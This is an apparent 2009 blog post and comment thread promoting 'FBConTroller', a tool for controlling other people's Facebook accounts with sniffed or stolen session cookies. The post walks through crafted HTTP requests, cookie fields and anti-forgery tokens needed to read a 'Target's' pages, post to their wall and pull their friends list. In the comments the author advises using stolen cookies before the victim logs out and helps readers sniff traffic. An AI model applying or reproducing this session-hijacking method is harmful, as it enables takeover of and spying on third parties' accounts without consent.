Moving Towards Normality

Actions and Attempts towards Blue Sleep

FBConTroller [ FACEBOOK CONTROLLER ] - The Ultimate Facebook Controller (without the Password)

Thursday, April 30, 2009 8:05:27 PM

, , ,

Let me clear that this utility WON'T hack/crack Facebook accounts !
The utility will need biscuits/cookies instead of the password.

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US


3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php


5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375



7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)


Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER) written
by me. You can also call it FACEBOOKIE, FACEHOOKER (since it hooks in someone else's cookies) ,FACEBHOOT or FACEBHOOK

Till now FBController version 1.0 uses your Target's provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List

More more features to come in version 2.0
A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.

Happy Controlling ! :-)

Sharing your Biscuits UnintenionallyFacebook covertly promotes Daughtry's Song - "What About Us" ?

Comments

Azim Poonawalaquakerdoomer Friday, May 1, 2009 4:26:12 AM

Inspite of making it clear in the beginning of the Emails in mailing list and on this Blog-Page itself that FBController DOES NOT HACK/CRACK FB Passwords and NEEDS to be provided the cookies, someone at Threatfire has decided to ignore this and compare FBController to a worm (http://blog.threatfire.com/2009/04/recipe-for-stealing-biscuits.html)
Threafire says that FBController "**STEALS**" Biscuits !
Also, Threatfire thinks malware distributors have now started distributing malwares via mailing lists. ROFL !

Its very disappointing to read such a careless irresponsible post from something like Threatfire !
I wouldn't be surprised if they develop a signature to thwart FBController from being transferred on the wire !


Azim Poonawalaquakerdoomer Sunday, May 3, 2009 5:26:17 AM

OKAY Very smart !!

Threatfire Blog (maybe after reading the above comment) quietly changed their statement
From:
"Another technique and tool has just been posted to steal biscuits, much like the Koobface worm, and it supports changing a wall without the password. The author claims to have just completed "FBController - The Ultimate Utility to Control Facebook accounts without the Password". "




To:
"Another technique and tool has just been posted to abuse stolen biscuits, much like the Koobface worm, and it supports changing a wall without the password." "


Good Boy

Anonymous Friday, May 8, 2009 11:49:20 PM

Anonymous writes: I tried this with my own cookie info. I also tried this with a friend's captured cookie data. I always get a "Incorrect Cookie or Cookie Expired" error. Below is the server's response. HTTP/1.1 301 Moved Permanently Date: Fri, 08 May 2009 23:44:22 GMT Server: Apache/1.3.41.fb2 P3P: CP="HONK" Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Edge-control: cache-maxage=10m Location: http://static.ak.facebook.com/login.php X-Cnection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 0 Any ideas??

Azim Poonawalaquakerdoomer Saturday, May 9, 2009 3:41:36 PM

Do you get it as soon as you provide the cookie parameters ?
Did you get the Message "Logged in as:" ?
Check if you were able to pull down any of the following :
The Target's Home(First)Page, IntentPage, Ajax Chat Page, Profile Page.
Check if these html files got created in the FBConTroller folder.

Azim Poonawalaquakerdoomer Saturday, May 9, 2009 7:01:18 PM

I see a new var in the cookie : "Akatest=A". Looks like a not-so-dynamic value. Need to check if absence of this var affects FBConTroller's performance. Hopefully not !

Anonymous Tuesday, May 19, 2009 12:13:51 AM

Yusuf writes: im still confusing how to using this tools..when i open this tools there is comand prompt appear in desktop so i read all and there is message that told me to "press any key to continue" and i did what it said,but nothing happened and the command prompt dissapear with nothing change,im try again with open my FB acc and do the same right thing but nothing happened too...could u tell me how to using this tools.may step by step..im sorry thanks alot

Anonymous Monday, May 25, 2009 4:10:59 PM

Anonymous writes: FBConTroller version 2.0

Anonymous Thursday, May 28, 2009 7:08:47 PM

Anonymous writes: can you provide a step by step guide to us that dont know html that well?

Azim Poonawalaquakerdoomer Sunday, May 31, 2009 6:12:42 PM

Are you asking me to teach you HTML ????

Anonymous Tuesday, June 2, 2009 10:25:10 PM

Bernhard writes: I cant seem to find the XS var. ? Is it still there?

Azim Poonawalaquakerdoomer Wednesday, June 3, 2009 5:32:50 PM

Bernhard : FB is crazy at times. There was a day when I couldn't find ABT. It came back the next day. Try and delete your Temp Files, old cookies. make sure your login email isn't appearing in the Username TextBox. Let me know.

P.S. Version 2 will eliminate the need to type/paste in individual variables.

Anonymous Monday, June 29, 2009 1:59:15 PM

thunderbolt writes: can u tell me how to use that tool step by step? because, i have tried but that didn't work thanx doomer ^_^

Anonymous Sunday, July 5, 2009 8:42:49 PM

Anonymous writes: I am in the same position as the previous person. It would be highly appreciated if you can create a Step by step guide on how to use this Program. Thank You!

Anonymous Friday, July 10, 2009 5:24:29 PM

Anonimo writes: Hi Azim, I tried to understand but I have a problem: where can I find the "53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES"? Thanks a lot

Anonymous Thursday, July 16, 2009 4:13:05 AM

Anónimo writes: how do I use the FBcontroller program?

Anonymous Sunday, July 26, 2009 7:40:01 AM

Blu3 D3v1L writes: Great Job! I couldn't use it though because i couldn't find all the cookies required, xs, c_user and h_user. however, as far as I have read the power of FBController is very limited. I hope that you would release a more powerful version soon. one more thing, it would be great if you release a GUI version too. Because most people are not familiar with coding.

Anonymous Sunday, July 26, 2009 7:59:15 AM

Blu3 D3v1L writes: Is there anyway to actually do anything with this? I entered using my cookies and some friends' as well but was unable to do anything with it. maybe, can you help with loggin in to facebook with those cookies?

Anonymous Monday, August 3, 2009 4:44:38 PM

rasta writes: hello if i got the cookie what i should do??where the function fbcontroller?? thnx

Anonymous Monday, August 3, 2009 4:45:43 PM

rasta writes: hello if i got the cookie what i should do??where the function fbcontroller?? thnx

Anonymous Sunday, October 25, 2009 4:33:50 PM

Wanderer writes: Hi there, Is it possible to set cookie parameters manually in browser? If yes which parameters should I consider adding? I usually use Firefox add-ons to edit cookie and set it to what I want. I just don't know how should I do it with fb cookies.

Anonymous Tuesday, November 17, 2009 9:12:02 AM

valipour writes: hello i have a question if i have an account username can i get the it's password or how i can get it thanks

Anonymous Wednesday, November 25, 2009 8:37:37 PM

Anonymous writes: kacook banyak nian tegawe apo>..?????

Anonymous Friday, December 11, 2009 3:07:12 AM

don writes: can i get/use cookies saved from a web browser instead of sniffing around.

Azim Poonawalaquakerdoomer Saturday, December 12, 2009 8:33:12 AM

You can but you won't find all the cookie variables.
Even if you do find them all, it won't work coz not all of them are static in nature. Example : xs

If you are stealing cookies from a web-browser, they have to be used before they are destroyed that is before the user signs off. Same goes when you retrieve cookies via sniffing.

Do you have any specific browser as your target ?

Anonymous Monday, January 4, 2010 7:32:01 PM

Anonymous writes: come posso fare a avere i cookies?? me lo potresti spiegare in modo semplice?

Azim Poonawalaquakerdoomer Wednesday, January 6, 2010 7:08:27 AM

Fushk uyaklu ben dianu Holland Poland Roland ??
Translate that !

Anonymous Thursday, January 7, 2010 3:42:10 PM

Anonymous writes: hi ! the program isnt working at all. it opens the window and asks to press any key and when i do it shuts down. pls show a step by step of how to do this. doesnt have to be detailed but at least let us know the basics. im not an expert with codes but im sure i learn quick. thank you.

Azim Poonawalaquakerdoomer Thursday, January 7, 2010 7:27:19 PM

I am sure you just downloaded FBController without reading the FAQ which is on the same page right below the Screenshots and the Download LINK. THE FAQ HAS BEEN SPECIALLY WRITTEN TO answer such queries.

I am tired of answering these "step-by-step guide", "oh-it-just-goes-away-after-Press-any-key" questions.

From now onwards, the answer is :
The programs checks the user's IQ and then decides on its own whether to work or not.

Anonymous Friday, January 8, 2010 4:53:26 PM

Anonymous writes: lol sry man . i know how to work it now . i just dont understand the part of getting the cookie . i know now what i was doing wrong. and that was through ur instructions of pressing the .bat file. so what my question was if u can explain the part of getting the cookie in a way the may be a bit more explained through steps for people with less IQ than yours like myself :D

Anonymous Friday, January 8, 2010 4:53:58 PM

Anonymous writes: lol sry man . i know how to work it now . i just dont understand the part of getting the cookie . i know now what i was doing wrong. and that was through ur instructions of pressing the .bat file. so what my question was if u can explain the part of getting the cookie in a way the may be a bit more explained through steps for people with less IQ than yours like myself :D

Azim Poonawalaquakerdoomer Saturday, January 9, 2010 10:47:21 AM

No ! I did not ask you to run the batch file. I told this to an Anonymous person here .. : http://my.opera.com/quakerdoomer/blog/fbcontroller-v3-0-facebook-control-utility-version-3-0#comments

.. who asked me why was he seeing just the startup screen with the Syntax despite of pasting the cookie in the Cookie.TXT file.
That anonymous person was not giving the argument to the exe. SO he was told to do that OR to run the batch file

Don't blame me for any of your actions !

And about how to get the cookie.. you are really not reading my answers.
I don't want to be rude but :
READ THE FAQ
REFER Q2 of FAQ which says :
"Q2. How do I get the cookie ?"

If you still can't get the cookie. Send me your FB Login and password. I'll send you back your cookie !

And you were wrong about my IQ coz the program sometimes refuses to work for me as well printf-ing "Stupid User Found"

Anonymous Tuesday, March 30, 2010 11:12:30 AM

francesco Veritti writes: hi, i didnt found h_user, i find all in the cookies and sniffing whit wireshark and smsniff, but i cannot find the h_user. i found something like as GET /ap.php?i=AAAAAwAgACAAAAD3iy55gQvbw2V3qnf4j2JpJWBB7N9VnF_JRyIuCRVPeo2l0fYlVRmcFxOfAm66Jm_yTcXnvOSGaKZT0bFOPsVImfNKtWSh8NzkAmQtje4VlBHGWrT2nmJ1bDDA-6yWxBq8Dp_DnLmZqutTgvnedyRJ5fJtoIfehRUTMMPEtwGQN4PeEuFM-VMZNA99FR_DtEvAN9pbAyEkTrQtg-N8ZQ9fwce_qVb2OmDt3YZ4qOc8h9DlqyrMyfRI_W_pM66L1rjxDMLbPI2i3_aMMlKO8zNpZDhL1rAf83Dh7lsSwMTLjnXJNTR01KsWobqPssYDsElIn7PazfVWlp0_RaXYBHUk2JgYL5_hFpIvCQR5RrLsl0zHV-Io3l2cqjU_JpOtcde-I--7WQkrGkCVP-eSBT5nHufRDYgFLgcnqCPvAZYPB4Q. HTTP/1.1 but the code is too long for be a h_user. pls let me know how to get h_user variable. thanks

Azim Poonawalaquakerdoomer Tuesday, March 30, 2010 6:37:49 PM

francesco Veritti :

Try and put a GET request to /home.php using your browser and then sniff
The variable h_user used to be in the "Cookie:" part but these days we don't find it. Instead we see something new called as "lo". This is a 22 charactered alphanumeric string.


One more intersting observation is : http://www.facebook.com/robots.txt

It says :
Disallow: /ap.php

So please try and access some other allowed page and then try and sniff the packets.



FBController v3 which is currently available (as of 31st March 2010) won't get you anywhere other than the Main page coz its other modules need to be modified accordingly which includes GUI action changes and the Cookie variables modifications.



One more reason for everyone to push me to go open source.

Anonymous Thursday, April 1, 2010 10:25:29 AM

Ismaila writes: Forgotten password and have forgotten every link to get a new one but dont want a new email what am i to do.

Azim Poonawalaquakerdoomer Friday, April 2, 2010 5:49:12 PM

Ismaila, Take a rebirth.

Anonymous Wednesday, April 14, 2010 11:31:04 AM

Mohmd writes: I use Leorat.com for spy with keylogger, this software use jpg for infection

Azim Poonawalaquakerdoomer Thursday, April 15, 2010 8:37:07 AM

What ?

Anonymous Tuesday, April 27, 2010 8:39:27 PM

curiousbystander writes: Hi, i searched google for "X-SVN-Rev:" and i got here do you guys know how the X-SVN-Rev parameter is calculated? and what does it mean?

Anonymous Tuesday, April 27, 2010 8:52:28 PM

curiousbystander writes: Actually, by "any of you guys" i mean Azim . :)

curiousbystander Tuesday, April 27, 2010 8:58:42 PM

here, im not anonymous anymore

Azim Poonawalaquakerdoomer Thursday, April 29, 2010 4:22:07 AM

Hi curiousbystander,
I reply to queries made by anons as well.. you can check.
X-SVN-Rev has to be the trunk release number for the some source FB maintains using subversion. I don't know for which code but SVN stands for subversion and Rev definitely stands for Revision (number).
FB uses python a lot in the backend.
Hope that helps.
to know more about subversion refer : http://subversion.tigris.org/

Anonymous Wednesday, July 28, 2010 4:54:30 PM

Gianluca writes: Hi, I'd like to try facebook controller but it seems that the download page doesn't work... are there any other pages where to download it please?

Azim Poonawalaquakerdoomer Wednesday, July 28, 2010 6:12:17 PM

No.

Anonymous Monday, March 14, 2011 5:16:06 PM

Anonimo writes: After the new facebook upgrade where I can find the cookies??

Azim Poonawalaquakerdoomer Monday, March 14, 2011 6:58:14 PM

In your stomach, else you'll need to downgrade it :-P

Anonymous Monday, March 14, 2011 7:18:24 PM

Tiger writes: Is there a new version of FBConTroller? i want to manage few facebook accounts together instead of logging-in each and every one of them

Azim Poonawalaquakerdoomer Tuesday, March 15, 2011 9:05:46 AM

Wow Tiger.. nice alibi.. You make FB sound like a bank :-P

Write a comment

You must be logged in to write a comment. If you're not a registered member, please sign up.

February 2012
M T W T F S S
January 2012March 2012
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29